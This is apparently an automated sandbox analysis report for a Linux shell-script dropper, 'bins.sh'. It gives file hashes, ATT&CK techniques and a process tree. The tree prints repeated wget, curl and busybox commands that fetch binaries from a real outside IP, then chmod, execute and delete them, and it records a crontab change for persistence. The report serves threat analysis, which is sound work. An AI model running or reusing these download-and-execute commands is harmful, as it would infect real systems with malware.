baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d

Analysis

max time kernel
150s
max time network
149s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
31-10-2024 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

add9df3fe0956071f11080084a31bdeb
SHA1

f7ae02765b04a8c8e2a9f9c67fe20acd4516fd05
SHA256

baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d
SHA512

2e6bd72689deb04f699f94d15949886de251783f5e5c037cd76647fc10b6777f1c7fa1659fbec5e824ef0427e152a3879744edfceed370b4a3213d41749cc84c
SSDEEP

96:9aG1ai9mSxkvymsIWTbbSb2bNbUb0bRG+aG1ai0SM9SvVkT7kmiec+vobbSb2bNj:7xkvymsIWTPK7GX

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

835 chmod
863 chmod
878 chmod
798 chmod
772 chmod
842 chmod
849 chmod
856 chmod
744 chmod

pid	process
835	chmod
863	chmod
878	chmod
798	chmod
772	chmod
842	chmod
849	chmod
856	chmod
744	chmod

Executes dropped EXE 9 IoCs

Processes:

tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEeIUGjQGP9j20LhOTC222fZIrfyOuPYtk9iReBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLsOYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJbzsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThVZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQKDBDhSt7ce4AH4R76TedzosCU6IiiU2hJdPdEZ8264siDtS3uUhD7KAvI2T1jba3WR13

ioc	pid	process
/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	745	tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	774	IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	799	eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	836	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb	843	OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV	850	zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ	857	ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd	864	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13	879	PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13

Renames itself 1 IoCs

Processes:

KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd

pid process

865 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.l8hddz crontab
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
865	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.l8hddz	crontab

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJdcurlcurlcurlcrontabcrontabcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/5/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/13/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/324/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/389/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/883/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/22/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/319/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/701/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/874/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/704/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/873/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/7/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/23/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/76/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/703/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/19/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/80/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/875/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/6/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/36/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/73/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/372/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/706/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/113/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/374/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/494/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/539/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/147/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/382/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/872/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/103/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/225/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/10/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/15/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/78/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/24/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/82/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/877/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/2/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/9/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/12/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/14/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/316/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/349/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/538/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/3/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/74/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/141/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/164/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/879/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/884/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/71/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/72/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/481/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/cmdline	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd

System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlbusyboxZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQrm

pid process

853 wget
854 curl
855 busybox
857 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
859 rm

pid	process
853	wget
854	curl
855	busybox
857	ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
859	rm

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetbusyboxcurlbusyboxwgetcurlbusyboxwgetbusyboxwgetbusyboxwgetcurlbusyboxcurlbusyboxwgetwgetbusyboxcurlbusyboxbusyboxcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV	wget
File opened for modification	/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd	wget
File opened for modification	/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13	busybox
File opened for modification	/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	curl
File opened for modification	/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	busybox
File opened for modification	/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	wget
File opened for modification	/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV	curl
File opened for modification	/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV	busybox
File opened for modification	/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ	wget
File opened for modification	/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	busybox
File opened for modification	/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	wget
File opened for modification	/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	busybox
File opened for modification	/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb	wget
File opened for modification	/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb	curl
File opened for modification	/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb	busybox
File opened for modification	/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ	curl
File opened for modification	/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ	busybox
File opened for modification	/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	wget
File opened for modification	/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	wget
File opened for modification	/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	busybox
File opened for modification	/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd	curl
File opened for modification	/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd	busybox
File opened for modification	/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN	busybox
File opened for modification	/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	curl
File opened for modification	/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	curl
File opened for modification	/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:704

/bin/rm
/bin/rm bins.sh
2⤵
PID:710

/usr/bin/wget
wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Writes file to tmp directory
PID:713

/usr/bin/curl
curl -O http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Writes file to tmp directory
PID:740

/bin/chmod
chmod 777 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- File and Directory Permissions Modification
PID:744

/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
./tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Executes dropped EXE
PID:745

/bin/rm
rm tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
PID:748

/usr/bin/wget
wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Writes file to tmp directory
PID:750

/usr/bin/curl
curl -O http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Writes file to tmp directory
PID:768

/bin/chmod
chmod 777 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- File and Directory Permissions Modification
PID:772

/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
./IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Executes dropped EXE
PID:774

/bin/rm
rm IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
PID:777

/usr/bin/wget
wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Writes file to tmp directory
PID:778

/usr/bin/curl
curl -O http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Writes file to tmp directory
PID:796

/bin/chmod
chmod 777 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- File and Directory Permissions Modification
PID:798

/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
./eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Executes dropped EXE
PID:799

/bin/rm
rm eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
PID:801

/usr/bin/wget
wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Writes file to tmp directory
PID:802

/usr/bin/curl
curl -O http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Writes file to tmp directory
PID:834

/bin/chmod
chmod 777 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- File and Directory Permissions Modification
PID:835

/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
./7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Executes dropped EXE
PID:836

/bin/rm
rm 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
PID:838

/usr/bin/wget
wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Writes file to tmp directory
PID:839

/usr/bin/curl
curl -O http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Writes file to tmp directory
PID:841

/bin/chmod
chmod 777 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- File and Directory Permissions Modification
PID:842

/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
./OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Executes dropped EXE
PID:843

/bin/rm
rm OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
PID:845

/usr/bin/wget
wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Writes file to tmp directory
PID:846

/usr/bin/curl
curl -O http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Writes file to tmp directory
PID:847

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Writes file to tmp directory
PID:848

/bin/chmod
chmod 777 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- File and Directory Permissions Modification
PID:849

/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
./zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Executes dropped EXE
PID:850

/bin/rm
rm zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
PID:852

/usr/bin/wget
wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853

/usr/bin/curl
curl -O http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:854

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855

/bin/chmod
chmod 777 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- File and Directory Permissions Modification
PID:856

/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
./ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:857

/bin/rm
rm ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- System Network Configuration Discovery
PID:859

/usr/bin/wget
wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Writes file to tmp directory
PID:860

/usr/bin/curl
curl -O http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Writes file to tmp directory
PID:862

/bin/chmod
chmod 777 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- File and Directory Permissions Modification
PID:863

/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
./KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:864

/bin/sh
sh -c "crontab -l"
3⤵
PID:866

/usr/bin/crontab
crontab -l
4⤵
- Reads runtime system information
PID:867

/bin/sh
sh -c "crontab -"
3⤵
PID:868

/usr/bin/crontab
crontab -
4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:869

/bin/rm
rm KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
PID:871

/usr/bin/wget
wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
PID:875

/usr/bin/curl
curl -O http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
PID:876

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- Writes file to tmp directory
PID:877

/bin/chmod
chmod 777 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- File and Directory Permissions Modification
PID:878

/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
./PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- Executes dropped EXE
PID:879

/bin/rm
rm PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
PID:881

/usr/bin/wget
wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
PID:882

/usr/bin/curl
curl -O http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
PID:883

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
- Writes file to tmp directory
PID:884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs

Filesize
100KB

MD5
3b78bb645b81d600c30713d416f666be

SHA1
23796112f2cce2afb2217498b5ecf2801ab550f2

SHA256
d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

SHA512
9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

Download Submit
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR

Filesize
84KB

MD5
64ece99ca4ab1c1405f5a3335d64a960

SHA1
b7395f2320a5bdadb78943b268708965cdbd1d74

SHA256
aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

SHA512
bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

Download Submit
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd

Filesize
129KB

MD5
54bec959d900ad930dc662f8092da57d

SHA1
9ae7ad9018eeac5aa89bcde68ec683a364ac7d55

SHA256
b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12

SHA512
904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

Download Submit
/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN

Filesize
24KB

MD5
2c164817262cdf2db80a789a8ed18588

SHA1
5774eb7a693e4b358f53d7be28679350c93de9f3

SHA256
f379bc3507a95d5f45e51ba846a67fd58d0ec0198caf0d0a89de9d3f7d2c4f94

SHA512
e480f484c1ba0a5db8ba533dd17ad7c66e8e97bf8997f55dd182ff233aebcc5dfaf05933b602041d8daec420706b128d88c62b7fe2221d730cc3763cbfd52c6d

Download Submit
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb

Filesize
129KB

MD5
52f72bcf31899453b40d37a7cbf55f35

SHA1
6dfca1bd70aad3e88713b02ec1669ba5a792456c

SHA256
ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495

SHA512
be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

Download Submit
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13

Filesize
93KB

MD5
8fad5e89ce3d2b6159ac2ce2fdf7c084

SHA1
27105a304b9bb7cd8a663d1b4da1d92fd8eea355

SHA256
24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

SHA512
71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

Download Submit
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ

Filesize
122KB

MD5
aadb8cc4b6eac7fce760c09262693884

SHA1
b55178ff3605f4bbfc9286d4c8ac445673232217

SHA256
b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843

SHA512
5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

Download Submit
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj

Filesize
80KB

MD5
22c527269cbd9b42f4ade79f52757efb

SHA1
c2456188a49af93b0d07af2a7cc1346d5be510bd

SHA256
100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97

SHA512
7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

Download Submit
/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe

Filesize
95KB

MD5
c20c610e14b8e59f5f8258a55fe7f27d

SHA1
e59a0b83d9882f2770f052a213cad25b0cbd53fc

SHA256
adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b

SHA512
dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

Download Submit
/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV

Filesize
101KB

MD5
a7e686eb3f74b104a5520f08cfd54eb5

SHA1
58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

SHA256
617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

SHA512
2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

Download Submit
/var/spool/cron/crontabs/tmp.l8hddz

Filesize
210B

MD5
221a138a974caf5b20ff228e90929ebb

SHA1
7f525c8ae4220363d994a78f499493229f75a995

SHA256
8b196ea7db5c07c24fae2809bcdbacfbffd854b11e6ee6c68e2da01e3b4b221c

SHA512
1730bc5d7437f003ec9a74b92ffdcff4b5bf7491c1c7da31e65aa9b417972de7896c4b6ceabb57fb04c08086d9385536be2224197ba29947c34b81436072e5e7

Download Submit